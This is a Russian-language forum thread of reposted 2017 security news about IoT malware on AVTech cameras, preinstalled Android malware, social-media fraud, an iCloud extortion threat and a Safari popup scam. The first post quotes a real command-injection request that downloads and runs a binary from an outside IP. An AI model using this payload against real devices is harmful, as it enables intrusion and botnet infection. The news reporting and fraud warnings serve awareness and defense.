Yarik-Sat

Автор Тема: Вирусы, хакеры, взломы  (Прочитано 219 раз)

Описание:

Оффлайн qwest

  • Зам. Администратора
  • Постоялец
  • *****
  • Сообщений: 329
  • Пол: Мужской
  • 49° с. ш. 28° в. д.
  • Сказали спасибо: 314
Вирусы, хакеры, взломы
« : 13 Март 2017, 09:04:28 »
0
Обнаружено новое вредоносное ПО для IoT-устройств

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет.

Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно.

Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО.
Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.



Оффлайн qwest

  • Зам. Администратора
  • Постоялец
  • *****
  • Сообщений: 329
  • Пол: Мужской
  • 49° с. ш. 28° в. д.
  • Сказали спасибо: 314
Вирусы, хакеры, взломы
« Ответ #1 : 13 Март 2017, 14:00:47 »
Android-смартфоны продаются с предустановленными вирусами

Check Point Mobile Research Team заявила, что обнаружила предустановленные вирусы в 38 моделях смартфонов, которые продаются через крупные телекоммуникационные компании.
Исследователи утверждают, что прошивки производителей были чистыми, а вредоносное ПО, собирающее пользовательские данные, было загружено где-то в цепочке поставок. При этом в список зараженных попали аппараты Samsung, LG и даже Googlen Nexus.
Шесть таких приложений из обнаруженных не могут быть удалены без перепрошивки телефона.
Check Point Mobile Research Team приводит список телефонов и найденных в них вредоносных процессов.

Asus Zenfone 2 - com.google.googlesearch
Google Nexus 5 - com.changba
Google Nexus 5 - com.mobogenie.daemon
Google Nexus 5X - com.changba
Lenovo A850 - com.androidhelper.sdk
LenovoS90 - com.google.googlesearch
LenovoS90 - com.skymobi.mopoplay.appstore
LG G4 - com.fone.player1
Oppo N3 - com.android.ys.services
OppoR7 plus - com.example.loader
Samsung Galaxy A5 - com.baycode.mop
Samsung Galaxy A5 - com.android.deketv
Samsung Galaxy Note 2 - com.fone.player0
Samsung Galaxy Note 2 - com.sds.android.ttpod
Samsung Galaxy Note 3 - com.changba
Samsung Galaxy Note 4 - com.kandian.hdtogoapp
Samsung Galaxy Note 4 - com.changba
Samsung Galaxy Note 4 air.fyzb3
Samsung Galaxy Note 5 - com.ddev.downloader.v2
Samsung Galaxy Note 8 - com.kandian.hdtogoapp
Samsung Galaxy Note Edge - com.changba
Samsung Galaxy Note Edge - com.mojang.minecraftpe
Samsung Galaxy S4 - com.lu.compass
Samsung Galaxy S4 - com.kandian.hdtogoapp
Samsung Galaxy S4 - com.changba
Samsung Galaxy S4 - com.changba
Samsung Galaxy S4 - com.mobogenie.daemon
Samsung Galaxy S7 - com.lu.compass
Samsung Galaxy Tab 2 - com.armorforandroid.security
Samsung Galaxy Tab S2 - com.example.loader
vivo X6 plus - com.android.ys.services
Xiaomi Mi 4i - com.sds.android.ttpod
Xiaomi Redmi - com.yongfu.wenjianjiaguanli
ZTE x500 - com.iflytek.ringdiyclient


  • 0

Оффлайн kakgrek

  • Модератор других разделов
  • Начинаю писать
  • *****
  • Сообщений: 228
  • Пол: Мужской
  • Сказали спасибо: 194
Вирусы, хакеры, взломы
« Ответ #2 : 16 Март 2017, 20:33:08 »
В Украине будут готовить специалистов по борьбе с киберпреступностью и пиратством


17 марта будет подписан Меморандум о сотрудничестве между Государственной службой интеллектуальной собственности (ГСИС) и Национальной академией внутренних дел (НАВД). В рамках данного меморандума предусмотрена реализация Проекта подготовки специалистов по борьбе с киберпреступностью и пиратством. Об этом говорится в сообщении, опубликованном на официальном сайте НАВД.

На базе Национальной академии внутренних дел будут сформированы специальные курсы подготовки специалистов по борьбе с киберпреступностью и пиратством. Этот опыт станет платформой для разработки образовательной программы, по которой будет происходить обучение правоохранителей новой генерации, призванных защитить и поднять инновационный потенциал Украины на современный качественный уровень.

Данный спецкурс смогут пройти сотрудники МВД, СБУ, фискально-таможенных органов и Государственной службы специальной связи, в обязанности которых входит защита авторских прав и борьба с киберпреступностью.

Готовить украинских специалистов кроме отечественных специалистов также будут международные эксперты правительственных и общественных структур из Европы и США.


  • 0

Оффлайн qwest

  • Зам. Администратора
  • Постоялец
  • *****
  • Сообщений: 329
  • Пол: Мужской
  • 49° с. ш. 28° в. д.
  • Сказали спасибо: 314
Вирусы, хакеры, взломы
« Ответ #3 : 25 Март 2017, 07:17:22 »
Мошенники возродили в соцсетях старую схему с выманиванием денег - киберполиция

Осторожно, компьютерные мошенники!
Украинцам в соцсетях снова начали поступать предложения со стороны «иностранных родственников» или просто «состоятельных иностранцев», которые, обещая оформления наследства, пытаются мошенническим способом завладеть средствами пользователей
Об этом на своем сайте сообщает Департамент киберполиции Национальной полиции Украины.
По данным правоохранителей, эта мошенническая схема была популярной в конце 1990-х - начале 2000-х годов, только тогда предложения поступали на электронную почту.
«Например, дальний-предальний родственник, который всю жизнь жил за границей, вдруг перед смертью узнал о вашем существовании и сразу решил оставить все свое богатство вам в наследство ... Однако для того, чтобы оформить необходимые документы для процедуры унаследования наследства, и для подтверждения реальности существования лица наследника на указанный мошенником счет необходимо отправить небольшую сумму, например в размере 200 - 300 долларов США», - рассказали в киберполиции.
Эта схема в свое время получила название «нигерийские письма счастья», потому что первыми ее освоили именно жители Нигерии. Позже она распространилась на другие страны Африки и Европы.
В киберполиции заметили, что иногда содержание писем меняется, например мошенники предлагают «на очень выгодных условиях вложить свои средства в инвестиции или перспективный бизнес, который в ближайшее время будет начат за рубежом».
На сегодня правоохранителям уже известны случаи попытки мошенников завладеть средствами украинских пользователей социальной сети «Facebook» - например, под предлогом оказания помощи отечественным волонтерским организациям зарубежными волонтерами или помощи от иностранных военнослужащих, которые сочувствуют украинским воинам.
В Краматорске жертвами мошенников за сутки стали 4 краматорчан разного возраста – от 21 до 64 лет. Все они поверили неизвестным, которые представлялись сотрудниками банков, и сообщали им информацию относительно своих карт или коды, приходили им на телефоны, и с помощью которых снимались деньги. Об этом сообщает Краматоский отдел полиции Донецкой области.

В 3 других случаях в Краматорский отдел полиции обратились горожане, которые были обмануты в ходе интернет-продажи. С каждым годом этот вид торговли становится более распространенным и популярным – ведь нужно терять время, чтобы добраться до торгового заведения и там искать нужный товар, все можно найти, не отходя от компьютера. Кроме того, в большинстве случаев покупка и продажа через интернет может будет выгоднее, чем в реальном магазине или торговый «точке». Однако с ростом популярности интернет-площадок растет также и количество злоумышленников, которые пытаются обогатиться противозаконным путем. Чаще всего они размещают объявления о продаже несуществующего товара с заведомо сниженной стоимости, а когда находятся покупатели – берут предоплату и исчезают
Таким образом обманули краматорчанина, который пытался приобрести инструменты и заплатил более 3 тыс. грн, и 36-летнего мужчину, который «купил» сахар оптом, а также 20-летнего парня, который хотел снять квартиру, даже не спросив адреса, а поверил в фото на сайте объявлений.
Всего с начала года в Краматорском отделе полиции зарегистрировано 104 случая мошенничества, то есть более чем 1 факт в сутки – от горожан, которые обращаются в полицию за помощью.
Чтобы не стать жертвой аферистов в полиции советуют:
-не доверять ночным звонкам от «правоохранителей» с требованием выкупа;
-никому не сообщать данные о своей банковской карточке: пин-код, СVV-код, срок действия карты, пароли с смс-сообщениями, поступающими от банка на мобильный;
-не совершать покупок в непроверенных интернет-магазинах;
-не доверять объявлениям в глобальной сети о больших скидках, дешевой распродаже товаров, акциях;
-не верить сообщению о выигрыше в акциях, в которых даже не участвовали;
-не нанимать неизвестных мастеров, которые все делают по дешевке;
-не впускать в свой дом незнакомцев;
-не доверять неизвестным людям, которые предлагают обменять деньги или выдать продукты питания;
-не верить «врачам» и «целителям», которые, пользуясь чужой бедой, выманивают последние деньги.
В полиции также советуют, что, если появились подозрения, что вас пытаются обмануть, не теряйте времени и звоните в полицию по телефону «102», или на мобильный номер дежурной части Краматорского отдела полиции в Донецкой области: +38 050 988 05 93.


  • 0

Оффлайн kakgrek

  • Модератор других разделов
  • Начинаю писать
  • *****
  • Сообщений: 228
  • Пол: Мужской
  • Сказали спасибо: 194
Вирусы, хакеры, взломы
« Ответ #4 : 25 Март 2017, 08:13:05 »
Хакеры доказали реальность угрозы удаления 300 млн аккаунтов пользователей iPhone и iPad


На этой неделе стало известно, что группа хакеров Turkish Crime Family (TCF) получила доступ к миллионам учетных записей Apple ID и угрожают удалить всю информацию пользователей. В Купертино заявили, что серверы и базы данных компании не были взломаны, и предположили утечку данных у сторонних сервисов, таких как LinkedIn.
После этого Turkish Crime Family обратились в прессу с тем, чтобы сообщить новые подробности о своих действиях против Apple. Так, в письме взломщики заявляют, что они по-прежнему планируют совершить атаку 7 апреля, если Apple не заплатит выкуп. По словам злоумышленников, все общение с компанией проходит в закрытых чатах.
Издание ZDNet получило от одного из участников хакерской группировки массив данных доступа к 54 аккаунтам iCloud. Все они оказались рабочими: журналистам удалось связаться с 10 владельцами, предупредить их об опасности и попросить поменять пароль.
То, что рассказали пользователи, может свидетельствовать о несколько устаревшем характере базы данных хакеров: вероятно, логины и пароли к iCloud были собраны в период с 2011 по 2015 год.
Согласно сообщению хакеров, они требуют у Apple $100 000 для каждого из семи членов организации или подарочные карты iTunes номиналом $1 млн для немедленной перепродажи в размере 60% от оригинальной стоимости.
Хакеры заявили, что собираются дистанционно стирать информацию с 2550 смартфонов в минуту с каждого сервера или около 38 млн учетных записей за час. Что касается общего количества, всего может быть затронуто от 519 до 627 млн или даже 717 млн аккаунтов. На официальной странице в Twitter организация говорит о 300 млн записей в iCloud.
Злоумышленники также рассказали о причинах, побудивших их на атаку. Их действия были вызваны задержанием четырех хакеров, которые взломали Yahoo в 2014 году.
Насколько реальна угроза, станет известно 7 апреля: в этот день хакеры пообещали удалить аккаунты.


  • 0

Оффлайн kakgrek

  • Модератор других разделов
  • Начинаю писать
  • *****
  • Сообщений: 228
  • Пол: Мужской
  • Сказали спасибо: 194
Вирусы, хакеры, взломы
« Ответ #5 : 29 Март 2017, 18:18:17 »
Хакеры вымогают деньги у любителей «клубнички» с помощью уязвимости в Safari


Хакеры используют уязвимость в браузере Safari для iOS с целью вымогательства денег у посетителей сайтов «для взрослых». Об этом сообщает Securitylab со ссылкой на исследование Lookout.
Проблема связана с тем, как Safari отображает всплывающие окна на JavaScript. Злоумышленники встроили во множество интернет-сайтов эксплоит, заставляющий Safari отображать бесконечное число всплывающих окон, что делает невозможным дальнейшее использование браузера.
Для того чтобы избавиться от навязчивых вплывающих баннеров и снова получить возможность пользоваться браузером, пользователь должен заплатить злоумышленникам. По словам мошенников, выкуп якобы является единственным эффективным способом очистить Safari от рекламы. В качестве выкупа хакеры требуют подарочные карты iTunes (жертва должна прислать им код карты в текстовом сообщении).
Несмотря на заявления мошенников, избавиться от рекламы очень просто – достаточно зайти в настройки и очистить кэш браузера. Однако данный способ известен не всем пользователям, а обращаться за помощью решаются немногие, так как Safari «зависает» на открытом порно-сайте с рекламой.
По словам исследователей, эксплоит был разработан для более ранних версий iOS, включая вышедшую в 2014 году iOS 8. Данный тип атак ранее был описан на одном из российских сайтов, сообщают эксперты. Уязвимость присутствует в Safari для iOS до версии 10.3 и была исправлена Apple в понедельник, 27 марта.


  • 0


Кто онлайн

Просматривают тему:
0 Пользователей и 1 Гость